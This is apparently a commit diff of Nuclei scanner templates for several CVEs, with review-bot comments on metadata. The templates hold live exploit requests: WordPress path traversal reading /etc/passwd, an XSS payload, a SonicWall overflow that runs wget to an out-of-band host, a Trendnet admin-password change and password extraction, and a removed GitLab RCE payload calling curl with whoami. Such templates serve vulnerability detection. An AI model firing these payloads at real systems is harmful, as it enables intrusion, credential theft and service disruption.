cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.7
|
||||
cve-id: CVE-2020-35749
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
- |
|
||||
GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
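Review bot: The second request hard-codes `post=372`; that id is specific to whatever install the template was written against, and if `post.php?action=edit` rejects a non-existent post before the `sjb_file` parameter is processed (not verifiable from the template alone), the check misses on most targets. A comment recording the assumption, e.g. `# post id is arbitrary here; the sjb_file handler is assumed to run regardless of the post — confirm against the wpscan reference`, or a small payload list of ids, would make the dependency explicit. `tags` lists both `wp` and `wordpress`; CVE-2021-20792 in this commit uses only `wordpress` while CVE-2021-24300 repeats both, so the commit should settle on one convention.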
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-36365
|
||||
|
||||
info:
|
||||
name: Smartstore < 4.1.0 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
|
||||
reference:
|
||||
- https://github.com/smartstore/SmartStoreNET/issues/2113
|
||||
- https://www.cvedetails.com/cve/CVE-2020-36365
|
||||
- https://github.com/smartstore/SmartStoreNET
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-36365
|
||||
cwe-id: CWE-601
|
||||
metadata:
|
||||
shodan-query: http.html:'content="Smartstore'
|
||||
tags: cve,cve2020,redirect,smartstore
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
||||
path:
|
||||
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: high
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability
|
||||
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
|
||||
reference:
|
||||
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
|
||||
tags: cve,cve2020,cacti,rce,oast
|
||||
|
|
|
@ -2,8 +2,10 @@ id: CVE-2020-9402
|
|||
|
||||
info:
|
||||
name: Django SQL Injection
|
||||
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
|
||||
description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.
|
||||
remediation: Upgrade to the latest version.
|
||||
reference:
|
||||
- https://www.debian.org/security/2020/dsa-4705
|
||||
- https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402
|
||||
- https://docs.djangoproject.com/en/3.0/releases/security/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9402
|
||||
|
@ -29,3 +31,5 @@ requests:
|
|||
- "ORA-06512:"
|
||||
- "Request Method:"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,42 @@
|
|||
id: CVE-2021-20038
|
||||
|
||||
info:
|
||||
name: SonicWall SMA100 Stack BoF to Unauthenticated RCE
|
||||
author: dwisiswant0, jbaines-r7
|
||||
severity: critical
|
||||
description: |
|
||||
A Stack-based buffer overflow vulnerability in SMA100
|
||||
Apache httpd server's mod_cgi module environment variables
|
||||
allows a remote unauthenticated attacker to potentially
|
||||
execute code as a 'nobody' user in the appliance.
|
||||
This vulnerability affected SMA 200, 210, 400, 410 and 500v
|
||||
appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv,
|
||||
10.2.1.2-24sv and earlier versions.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
|
||||
tags: cve,cve2021,overflow,rce,sonicwall
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-20038
|
||||
cwe-id: CWE-787
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: clusterbomb
|
||||
payloads:
|
||||
prefix_addr:
|
||||
- "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
|
||||
system_addr:
|
||||
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
||||
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
|
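Review bot: `description: |` is a literal block scalar, so the loaded description keeps the seven embedded line breaks; `>-` folds them into one sentence, which is the form the other templates here use and what CVE-2020-14882 in this same commit converts to. The request sends a stack-overflow payload whose `system_addr` values are, per their own comments, correct only for the two firmware builds named; on any other build the overflow is still sent with a wrong address, which by the description's account would at best do nothing and may disrupt the CGI process. Since CVE-2021-20158 in this commit tags a service-affecting check with `intrusive,dos`, the same tags fit here, and a comment on `payloads` such as `# addresses are firmware-specific; other builds receive the overflow with a wrong return address` would warn operators before they run it.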
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-20150
|
||||
|
||||
info:
|
||||
name: Trendnet AC2600 TEW-827DRU - Credentials Disclosure
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 improperly discloses information via redirection from the setup wizard. Authentication can be bypassed and a user may view information as Admin by manually browsing to the setup wizard and forcing it to redirect to the desired page.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-20150
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.html:"TEW-827DRU"
|
||||
tags: cve,cve2021,trendnet,disclosure,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'ftp_username'
|
||||
- 'ftp_password'
|
||||
- 'ftp_permission'
|
||||
- 'TEW-827DRU'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
name: password
|
||||
group: 1
|
||||
regex:
|
||||
- '<input name="admin_passwd" type="password" id="admin_passwd" size="20" maxlength="15" value ="(.*)" />'
|
|
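Review bot: `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` evaluates to 9.8, yet `cvss-score: 5.30` and `severity: medium` sit next to it; a 5.3 score under CVSS 3.1 corresponds to a vector of the form C:L/I:N/A:N, so one of the two fields was copied from elsewhere and they should be reconciled against the NVD entry in `reference`. The same vector appears in CVE-2021-20158 in this commit, where `9.80` does match it, which looks like the source of the copy. The `password` extractor writes the device's admin password into the scan output; a comment such as `# extracts the admin password from the leaked form field; it will appear in results and exports` would make that visible to whoever reviews or shares the results.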
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-20158
|
||||
|
||||
info:
|
||||
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2021-54
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-20158
|
||||
cwe-id: CWE-287
|
||||
metadata:
|
||||
shodan-query: http.html:"TEW-827DRU"
|
||||
tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei
|
||||
- |
|
||||
POST /apply_sec.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'setConnectDevice'
|
||||
- 'setInternet'
|
||||
- 'setWlanSSID'
|
||||
- 'TEW-827DRU'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
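Review bot: The second `reference` entry is `https://nvd.nist.gov/vuln/detail/CVE-2021-20150`, the sibling template's CVE; for this file it should be `https://nvd.nist.gov/vuln/detail/CVE-2021-20158` (the Tenable advisory covers both devices' issues, the NVD link does not). The `description` should also state what a positive result means operationally: the first request overwrites the device's administrator password and the template does not restore it, so the device will require the new credential afterwards. The `intrusive,dos` tags hint at this, but a reader of the description alone would not know it.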
@ -0,0 +1,48 @@
|
|||
id: CVE-2021-20792
|
||||
|
||||
info:
|
||||
name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors."
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20792
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-20792
|
||||
cwe-id: CWE-79
|
||||
tags: wordpress,cve,cve2021,wp-plugin,authenticated
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||||
|
||||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||||
|
||||
- |
|
||||
GET /wp-admin/admin.php?page=mlw_quiz_list&s="></script><script>alert(document.domain)</script>&paged="></script><script>alert(document.domain)</script> HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
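Review bot: The `description` ends with a stray double quote (`...via unspecified vectors."`), a copy-paste remnant that should be removed. `tags` lacks `xss` even though the `name` and `cwe-id: CWE-79` identify this as a cross-site scripting check; the other XSS template in this commit (CVE-2021-24300) uses `tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated`, so `tags: wordpress,cve,cve2021,wp-plugin,xss,authenticated` keeps the two filterable together.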
@ -0,0 +1,38 @@
|
|||
id: CVE-2021-21973
|
||||
|
||||
info:
|
||||
name: VMware vCenter Unauthenticated SSRF
|
||||
author: pdteam
|
||||
severity: medium
|
||||
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
|
||||
- https://twitter.com/osama_hroot/status/1365586206982082560
|
||||
- https://twitter.com/bytehx343/status/1486582542807420928
|
||||
tags: cve,cve2021,vmware,ssrf,vcenter,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.30
|
||||
cve-id: CVE-2021-21973
|
||||
cwe-id: CWE-918
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Vcip: {{interactsh-url}}
|
||||
Vcpassword: {{rand_base(6)}}
|
||||
Vcusername: {{rand_base(6)}}
|
||||
Reqresource: {{rand_base(6)}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "The server sent HTTP status code 200"
|
|
@ -1,63 +1,128 @@
|
|||
id: CVE-2021-22205
|
||||
|
||||
info:
|
||||
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
||||
author: pdteam
|
||||
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
|
||||
author: GitLab Red Team
|
||||
severity: critical
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
||||
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
|
||||
reference:
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
|
||||
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
|
||||
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
|
||||
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
|
||||
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||
- https://hackerone.com/reports/1154542
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||
tags: cve,cve2021,gitlab,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.90
|
||||
cve-id: CVE-2021-22205
|
||||
cwe-id: CWE-20
|
||||
tags: cve,cve2021,gitlab,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /users/sign_in HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{BaseURL}}
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/users/sign_in"
|
||||
|
||||
- |
|
||||
POST /uploads/user HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
||||
X-CSRF-Token: {{csrf-token}}
|
||||
|
||||
{{hex_decode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}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
||||
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
redirects: true
|
||||
max-redirects: 3
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Failed to process image'
|
||||
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
words:
|
||||
- "dns"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 422
|
||||
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
|
||||
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
|
||||
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
|
||||
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
|
||||
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
|
||||
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
|
||||
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
|
||||
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
|
||||
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
|
||||
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
|
||||
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
|
||||
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
|
||||
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
|
||||
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
|
||||
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
|
||||
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
|
||||
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
|
||||
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
|
||||
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
|
||||
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
|
||||
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
|
||||
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
|
||||
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
|
||||
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
|
||||
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
|
||||
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
|
||||
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
|
||||
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
|
||||
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
|
||||
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
|
||||
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
|
||||
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
|
||||
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
|
||||
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
|
||||
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
|
||||
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
|
||||
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
|
||||
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
|
||||
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
|
||||
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
|
||||
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
|
||||
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
|
||||
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
|
||||
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
|
||||
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
|
||||
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
|
||||
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
|
||||
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
|
||||
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
|
||||
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
|
||||
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
|
||||
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
|
||||
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
|
||||
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
|
||||
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
|
||||
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
|
||||
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
|
||||
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
|
||||
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
|
||||
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
|
||||
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
|
||||
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
|
||||
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
|
||||
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
|
||||
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
|
||||
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
|
||||
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
|
||||
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
|
||||
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
|
||||
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
|
||||
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
|
||||
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
|
||||
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
|
||||
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
|
||||
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
|
||||
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
|
||||
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
|
||||
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
|
||||
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
|
||||
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
|
||||
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
|
||||
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
|
||||
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
|
||||
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
|
||||
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
|
||||
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
|
||||
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
|
||||
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
|
||||
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
|
||||
condition: or
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: csrf-token
|
||||
internal: true
|
||||
group: 1
|
||||
regex:
|
||||
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
||||
|
||||
- type: regex
|
||||
name: whoami
|
||||
part: interactsh_request
|
||||
group: 1
|
||||
regex:
|
||||
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
|
||||
- '(?:application-)(\S{64})(?:\.css)'
|
|
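Review bot: The 89 digest literals in the new `words:` list carry no indication of which GitLab version each one fingerprints, and the only tooling that maps versions to digests is a repository link under `reference`; every GitLab release that ships a fresh `application-*.css` digest will silently go undetected until someone regenerates the list. A comment above the list, e.g. `# 64-character digests of application-<hash>.css for GitLab builds in the CVE-2021-22205 affected range; regenerate with the hash-generator linked in reference when the range changes`, together with the generation date, would make the maintenance contract explicit. The regex extractor `(?:application-)(\S{64})(?:\.css)` captures the digest in group 1; unless the new side keeps a `group: 1` line (the old `group: 1` lines sit among removed extractor fields and this rendered view does not show which survived), the extracted value will include the `application-` prefix and `.css` suffix. The word matcher uses nuclei's default part, the response body, which is where the stylesheet link lives, so the description's phrase "in the header" refers to the HTML head rather than HTTP headers and could say so to avoid misreading.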
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-24300
|
||||
|
||||
info:
|
||||
name: PickPlugins Product Slider for WooCommerce < 1.13.22 - XSS
|
||||
author: cckuailong
|
||||
severity: medium
|
||||
